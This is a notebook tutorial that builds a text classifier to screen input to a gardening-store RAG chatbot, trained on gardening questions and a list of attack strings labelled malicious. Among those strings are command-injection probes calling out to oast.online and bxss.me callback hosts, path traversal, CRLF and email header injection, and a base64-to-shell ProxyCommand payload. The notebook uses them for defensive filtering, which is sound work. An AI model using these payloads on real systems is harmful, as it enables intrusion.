# Content Design for RAG
This notebook is part of a collection of material related to content design principles for retrieval-augmented generation (RAG).

You can explore the complete collection here: [Content Design for RAG on GitHub](https://github.com/spackows/ICAAI-2024_RAG-CD/blob/main/README.md)

**Example scenario**

Imagine your company sells seeds and gardening supplies online.  On your website, you have articles with gardening information and advice.  You are building a RAG solution for your company website that can answer customer questions about your products, using your website articles as a knowledge base.

# Filter input
When users submit input to your RAG solution, you need to make sure that malicious input, such as JavaScript-injection attempts, is rejected immediately and never passed along to your solution, where it could do harm.

This sample notebook demonstrates a simple approach to this problem.  A traditional text classifier is a good tool for this job.

**Contents**
1. Training data
2. Create text classifier
3. Test input

## 1. Training data

In [1]:
valid_arr = [
{ "labels" : [ "valid" ], "text" : "What is a cucumber?" },
{ "labels" : [ "valid" ], "text" : "What are the varieties of tomato?" },
{ "labels" : [ "valid" ], "text" : "What is the biggest gourd" },
{ "labels" : [ "valid" ], "text" : "how tall do sunflwers get?" },
{ "labels" : [ "valid" ], "text" : "What is the best dirt" },
{ "labels" : [ "valid" ], "text" : "The reason for black spots" },
{ "labels" : [ "valid" ], "text" : "Best type of fertizlier" },
{ "labels" : [ "valid" ], "text" : "can you plant indoors?" },
{ "labels" : [ "valid" ], "text" : "I got only one cucumber then it died" },
{ "labels" : [ "valid" ], "text" : "What is a trellis for?" },
{ "labels" : [ "valid" ], "text" : "How do you protect plants from late frost in spring?" },
{ "labels" : [ "valid" ], "text" : "Do peppers like full sun" },
{ "labels" : [ "valid" ], "text" : "Can I grow only one bluberry plant, or do I need multiple ones" },
{ "labels" : [ "valid" ], "text" : "what is the cause for blight?" },
{ "labels" : [ "valid" ], "text" : "What is the easiest plant to grow" },
{ "labels" : [ "valid" ], "text" : "how big of a pot do I need to grow hot peppers?" },
{ "labels" : [ "valid" ], "text" : "Can you harvest raspberries the first year" },
{ "labels" : [ "valid" ], "text" : "How to stop slugs from eating holes in peppers" },
{ "labels" : [ "valid" ], "text" : "whatis vermiculite" },
{ "labels" : [ "valid" ], "text" : "How to store strawberries so theystay fresh?" },
{ "labels" : [ "valid" ], "text" : "Can you can without boiling the jars first?" },
{ "labels" : [ "valid" ], "text" : "how long can cucumbers keep after you pick them" },
{ "labels" : [ "valid" ], "text" : "My peppers neevr got ripe" },
{ "labels" : [ "valid" ], "text" : "If I want to start tomatoes indoors, how much light do they need and when should I start them?" },
{ "labels" : [ "valid" ], "text" : "Is a cucumber a fruit or a vegitable?" },
{ "labels" : [ "valid" ], "text" : "Do you sell grow lights?" },
{ "labels" : [ "valid" ], "text" : "How can I stop my spinach from going to seeds" },
{ "labels" : [ "valid" ], "text" : "Ca I grow bananas where I live" },
{ "labels" : [ "valid" ], "text" : "how to harvest potatoes without cutting them up" },
{ "labels" : [ "valid" ], "text" : "Can you grow peanuts in a planter" },
{ "labels" : [ "valid" ], "text" : "will copper stop snails" },
{ "labels" : [ "valid" ], "text" : "the birds keep eating the fruit" },
{ "labels" : [ "valid" ], "text" : "what fencing keeps out bears?" },
{ "labels" : [ "valid" ], "text" : "How hot is too hot for what fruits?" }
]

In [2]:
malicious_arr = [
{ "labels" : [ "malicious" ], "text" : "!((&!|*|*|" },
{ "labels" : [ "malicious" ], "text" : "\${@print(md5(31347))}" },
{ "labels" : [ "malicious" ], "text" : "&echo amjfzp()\ weltsxd^xyz||a #' &echo amjfzp" },
{ "labels" : [ "malicious" ], "text" : "&nslookup hitndmwedlswo45776\.bxss\.me&'`0&nslookup hitndmwedlswo45776\.bxss\.me&`'" },
{ "labels" : [ "malicious" ], "text" : ")))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))" },
{ "labels" : [ "malicious" ], "text" : "*:*&fl=*,id:[value%20v='\u0036\u0036\u003690295675\u0039\u0039'],name:[value%20v='\u0036\u0036\u003690295675\u0039\u0039'],content:[value%20v='\u0036\u0036\u003690295675\u0039\u0039\u0039'],body:[value%20v='\u0036\u0036\u003690295675\u0039\u0039\u0039'],title:[value%20v='\u0036\u0036\u003690295675\u0039\u0039']&rows=1#" },
{ "labels" : [ "malicious" ], "text" : "../e" },
{ "labels" : [ "malicious" ], "text" : "'.print(md5(31347)).'" },
{ "labels" : [ "malicious" ], "text" : "/etc/shells" },
{ "labels" : [ "malicious" ], "text" : "/xfs\.bxss\.me" },
{ "labels" : [ "malicious" ], "text" : "@@17Llb" },
{ "labels" : [ "malicious" ], "text" : "[email protected]" },
{ "labels" : [ "malicious" ], "text" : "^(!#@#" },
{ "labels" : [ "malicious" ], "text" : "{'$acunetix': '1'}" },
{ "labels" : [ "malicious" ], "text" : "|nslookup cff65eh5d97qmkj1gousqozq1q5jeg\.oast\.online|curl cff65eh5d97qmkj1gousqozq1q5jeg\.oast\.online" },
{ "labels" : [ "malicious" ], "text" : "<h1>test<" },
{ "labels" : [ "malicious" ], "text" : "1;nslookup{IFS}cff65eh5d97qmkj1rnen5ue1o9iwk4\.oast\.online;\#" },
{ "labels" : [ "malicious" ], "text" : "aaa&shards=http://hitajtaveq480a\.bxss\.me/solr" },
{ "labels" : [ "malicious" ], "text" : "bxss\.me/t/xss\.html?%00" },
{ "labels" : [ "malicious" ], "text" : "cookie_injection" },
{ "labels" : [ "malicious" ], "text" : "Dn6v8NGW" },
{ "labels" : [ "malicious" ], "text" : "ebcc:009217.1488-5603146.1458.a12e8.19016.2@bxss.me" },
{ "labels" : [ "malicious" ], "text" : "echo mqjqou()\ nxuyfrz^xyu||a #' &echo mqjqou" },
{ "labels" : [ "malicious" ], "text" : "FUZZ/../../../../../../../../../../../../../../var/www/html/index.html" },
{ "labels" : [ "malicious" ], "text" : "FUZZ/.travis.sh" },
{ "labels" : [ "malicious" ], "text" : "FUZZ/phpMyAdmin 2/server_import.php" },
{ "labels" : [ "malicious" ], "text" : "Http://bxss\.me/t/fit.txt" },
{ "labels" : [ "malicious" ], "text" : "http://dicrpdbjmmfyopp.zzz/yrphmgdpgulaszriylefmacafkxycjaxjs?.jpg" },
{ "labels" : [ "malicious" ], "text" : "pBt49H3V" },
{ "labels" : [ "malicious" ], "text" : "PC90Mj2NyaXB0PmFsZXJ0KY3VtZW50LmRvbWFpbik8L3NjcmlwdD48aDI" },
{ "labels" : [ "malicious" ], "text" : "to@example.com>bcc:009247.16187-244247.16707.22w18.19098.2@bxss.me" },
{ "labels" : [ "malicious" ], "text" : "x -oProxyCommand=echo bnNsb29rdXJTdCJTdCaW50ZXJRzaC1mwlN0QlN0Q=|base64 -d|sh}" }
]

In [3]:
training_arr = valid_arr + malicious_arr

In [6]:
import json
with open( "training_data.json", "w", encoding="utf-8" ) as file:
    json.dump( training_arr, file, ensure_ascii=False, indent=3 )

!ls

training_data.json
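
Before uploading the file, it can help to sanity-check the records. The sketch below is not part of the original notebook: `summarize_training_data` is a hypothetical helper, and the "exactly one label per record" rule is an assumption based on the `single_label` model type used in the next section. It runs on a small stand-in sample; in the notebook you would pass `training_arr` instead.

```python
from collections import Counter

def summarize_training_data(records):
    """Check each record's shape and count examples per label (hypothetical helper)."""
    counts = Counter()
    for i, rec in enumerate(records):
        labels = rec.get("labels")
        text = rec.get("text")
        # Assumption: a single-label classifier expects exactly one label per record
        if not isinstance(labels, list) or len(labels) != 1:
            raise ValueError(f"record {i}: expected exactly one label")
        if not isinstance(text, str) or not text.strip():
            raise ValueError(f"record {i}: text must be a non-empty string")
        counts[labels[0]] += 1
    return dict(counts)

# Small stand-in sample using the same record format as the training data above
sample = [
    {"labels": ["valid"], "text": "What is a cucumber?"},
    {"labels": ["valid"], "text": "Do peppers like full sun"},
    {"labels": ["malicious"], "text": "<h1>test<"},
]
summary = summarize_training_data(sample)
print(summary)
```

A large imbalance between the two labels, or a record that raises an error here, is worth fixing before training.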


## 2. Create text classifier
This sample uses the [Natural Language Understanding service on IBM Cloud](https://cloud.ibm.com/catalog/services/natural-language-understanding).

See: 
- [Create classification model](https://cloud.ibm.com/apidocs/natural-language-understanding?code=python#createclassificationsmodel)
- [JSON format training data](https://cloud.ibm.com/docs/natural-language-understanding?topic=natural-language-understanding-classifications#training-data-in-json-format)

In [7]:
# Paste the credentials for your NLU service instance here
nlu_apikey = ""
nlu_url = ""

In [None]:
!pip install ibm-watson | tail -n 1

In [9]:
from ibm_watson import NaturalLanguageUnderstandingV1
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator

auth = IAMAuthenticator( nlu_apikey )
nlu = NaturalLanguageUnderstandingV1( version="2022-04-07", authenticator=auth )
nlu.set_service_url( nlu_url )

In [None]:
parms = { "model_type" : "single_label" }
model_id = ""
with open( "training_data.json", "rb" ) as file:
    model = nlu.create_classifications_model( language="en", training_data=file, training_parameters=parms ).get_result()
    model_id = model["model_id"]
    print( json.dumps( model, indent=2 ) )
    print( "\nmodel_id: " + model_id )

In [14]:
from time import sleep

model_info = nlu.get_classifications_model( model_id=model_id ).get_result()

counter = 0
# Poll every 8 seconds, up to 40 times, until training finishes
while counter < 40 and model_info["status"] != "available":
    counter += 1
    sleep( 8 )
    model_info = nlu.get_classifications_model( model_id=model_id ).get_result()
    print( "( " + str( counter ) + " ) status: " + model_info["status"] )

if model_info["status"] == "available":
    print( "\nClassifier ready\n" )
else:
    print( "\nClassifier not ready.  Run this cell again to continue monitoring training." )


Classifier ready
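
The polling loop above could also be wrapped in a reusable function. This is a minimal sketch, not the notebook's own code: `wait_until_available` and its parameters are hypothetical names, and treating `"error"` as a status that ends the wait early is an assumption about the service. The demo uses a fake status source so that it runs without an NLU instance.

```python
from time import sleep

def wait_until_available(get_status, max_polls=40, interval_s=8,
                         sleep_fn=sleep, stop_statuses=("error",)):
    """Poll get_status() until it returns "available", a stop status, or polls run out.

    Returns the last status seen. stop_statuses is an assumption, not a documented list.
    """
    status = get_status()
    polls = 0
    while status != "available" and status not in stop_statuses and polls < max_polls:
        sleep_fn(interval_s)
        status = get_status()
        polls += 1
    return status

# Demo with a fake status source and a no-op sleep, so nothing actually waits
fake_statuses = iter(["training", "training", "available"])
final_status = wait_until_available(lambda: next(fake_statuses), sleep_fn=lambda s: None)
print(final_status)
```

In the notebook, `get_status` could be `lambda: nlu.get_classifications_model( model_id=model_id ).get_result()["status"]`, which is the same call the loop above makes.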



## 3. Test input

See: [Analyze text](https://cloud.ibm.com/apidocs/natural-language-understanding?code=python#analyze)

In [22]:
from ibm_watson.natural_language_understanding_v1 import Features, ClassificationsOptions

def classify( input_txt ):
    # Classify the text with the custom model and return the higher-scoring class name
    result = nlu.analyze( text=input_txt, features=Features( classifications=ClassificationsOptions( model=model_id ) ) ).get_result()
    #print(json.dumps( result, indent=2 ) )
    # The model was trained on two labels ("valid" and "malicious"), so two entries are expected
    class_0 = result["classifications"][0]["class_name"]
    score_0 = result["classifications"][0]["confidence"]
    class_1 = result["classifications"][1]["class_name"]
    score_1 = result["classifications"][1]["confidence"]
    print( class_0 + ": " + str( score_0 ) )
    print( class_1 + ": " + str( score_1 ) )
    return class_0 if ( score_0 > score_1 ) else class_1
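
The `classify` function above reads exactly two entries from the response. As a hedged alternative, the sketch below picks the highest-confidence entry however many entries there are. `top_classification` is a hypothetical helper, and `sample_result` is a hand-written dictionary that mirrors only the fields the notebook reads (`classifications`, `class_name`, `confidence`), not a full service response.

```python
def top_classification(result):
    """Return (class_name, confidence) for the highest-confidence entry."""
    entries = result.get("classifications", [])
    if not entries:
        raise ValueError("no classifications in result")
    best = max(entries, key=lambda c: c["confidence"])
    return best["class_name"], best["confidence"]

# Hand-written stand-in for the parsed response, limited to the fields used above
sample_result = {
    "classifications": [
        {"class_name": "valid", "confidence": 0.999997},
        {"class_name": "malicious", "confidence": 3e-06},
    ]
}
top_name, top_score = top_classification(sample_result)
print(top_name, top_score)
```

Returning the confidence along with the class name lets the caller apply its own threshold.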

In [24]:
txt = "How can I grow cucumbers faster?"
class_name = classify( txt )
print( "\nClass: " + class_name )

valid: 0.999997
malicious: 3e-06

Class: valid


In [25]:
txt = "Set-Cookie:crlfinjection=crlfinjection"
class_name = classify( txt )
print( "\nClass: " + class_name )

malicious: 0.999374
valid: 0.000626

Class: malicious
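
To act on these results, the classifier has to sit in front of the RAG solution as a gate. The following is a minimal sketch under stated assumptions, not the notebook's implementation: `handle_input`, `is_allowed`, `stub_classify`, and `stub_answer` are hypothetical names, the classifier is assumed to return a `(class_name, confidence)` pair (the notebook's `classify` returns only the class name), and the `0.9` threshold is an arbitrary illustrative value. The stub scores reuse the two outputs shown above.

```python
REJECTION_MESSAGE = "Sorry, I can't help with that input."

def is_allowed(class_name, confidence, min_confidence=0.9):
    """Allow input only when it is classified "valid" with enough confidence."""
    return class_name == "valid" and confidence >= min_confidence

def handle_input(text, classify_fn, answer_fn, min_confidence=0.9):
    """Classify first; call the RAG answer function only for allowed input."""
    class_name, confidence = classify_fn(text)
    if not is_allowed(class_name, confidence, min_confidence):
        return REJECTION_MESSAGE
    return answer_fn(text)

# Stub classifier: returns the scores shown in the test cells above,
# and a low-confidence "valid" for anything else
stub_scores = {
    "How can I grow cucumbers faster?": ("valid", 0.999997),
    "Set-Cookie:crlfinjection=crlfinjection": ("malicious", 0.999374),
}

def stub_classify(text):
    return stub_scores.get(text, ("valid", 0.5))

# Stub standing in for the RAG solution itself
def stub_answer(text):
    return "ANSWER: " + text

good = handle_input("How can I grow cucumbers faster?", stub_classify, stub_answer)
bad = handle_input("Set-Cookie:crlfinjection=crlfinjection", stub_classify, stub_answer)
unsure = handle_input("asdf", stub_classify, stub_answer)
print(good)
print(bad)
print(unsure)
```

Rejecting low-confidence "valid" results as well is a design choice: it trades some false rejections for a lower chance of passing along input the classifier is unsure about.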
